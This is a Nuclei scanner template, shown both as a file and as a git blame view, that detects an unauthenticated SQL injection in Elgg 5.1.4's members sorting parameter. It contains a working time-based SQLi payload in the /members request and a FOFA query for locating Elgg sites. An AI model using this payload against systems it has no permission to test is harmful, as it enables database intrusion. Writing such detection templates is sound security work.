nuclei-templates/http/vulnerabilities/other/elgg-sqli.yaml

id: elgg-sqli

info:
  name: Elgg 5.1.4 - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.
  reference:
    - https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md
    - https://github.com/Elgg/Elgg
  metadata:
    verified: true
    max-request: 1
    vendor: elgg
    product: elgg
    fofa-query: icon_hash="413602919"
  tags: elgg,sqli

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"elgg.js")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        @timeout 20s
        GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 6'
          - 'contains(body,"All members")'
          - 'status_code == 200'
        condition: and
# digest: 490a00463044022030d8c3dbfc3a5a3e7bfb9ad41f142260078d81ec23eed193e8108a42e5d6a8ae022050bca5d9818b5e0b656a96c77fb146aef53a16d35160004229b3ed8778e07c2b:922c64590222798bb761d5b6d8e72950
elgg sqli 2024-08-21 17:39:15 +00:00			`id: elgg-sqli`

			`info:`
			`name: Elgg 5.1.4 - SQL Injection`
			`author: s4e-io`
			`severity: high`
			`description: \|`
			`Elgg 5.1.4 version has a SQL Injection vulnerability in the sort_by[direction] parameter. This vulnerability allows an unauthenticated attacker to manipulate SQL queries by injecting malicious SQL code, potentially leading to unauthorized data access or database compromise. No user authentication is required to exploit this vulnerability.`
			`reference:`
			`- https://github.com/4rdr/proofs/blob/main/info/Elgg_unauth_SQLi_5.1.4.md`
			`- https://github.com/Elgg/Elgg`
			`metadata:`
updated metadata 2024-08-28 03:20:42 +00:00			`verified: true`
elgg sqli 2024-08-21 17:39:15 +00:00			`max-request: 1`
			`vendor: elgg`
			`product: elgg`
			`fofa-query: icon_hash="413602919"`
			`tags: elgg,sqli`

			`flow: http(1) && http(2)`

			`http:`
			`- raw:`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(body,"elgg.js")'`
			`- 'status_code == 200'`
			`condition: and`
			`internal: true`

			`- raw:`
			`- \|`
			`@timeout 20s`
			`GET /members?sort_by%5Bproperty%5D=name&sort_by%5Bproperty_type%5D=metadata&sort_by%5Bdirection%5D=desc%2c(select*from(select(sleep(6)))a) HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'duration >= 6'`
			`- 'contains(body,"All members")'`
			`- 'status_code == 200'`
			`condition: and`
chore: sign templates 🤖 2024-08-28 06:58:35 +00:00			`# digest: 490a00463044022030d8c3dbfc3a5a3e7bfb9ad41f142260078d81ec23eed193e8108a42e5d6a8ae022050bca5d9818b5e0b656a96c77fb146aef53a16d35160004229b3ed8778e07c2b:922c64590222798bb761d5b6d8e72950`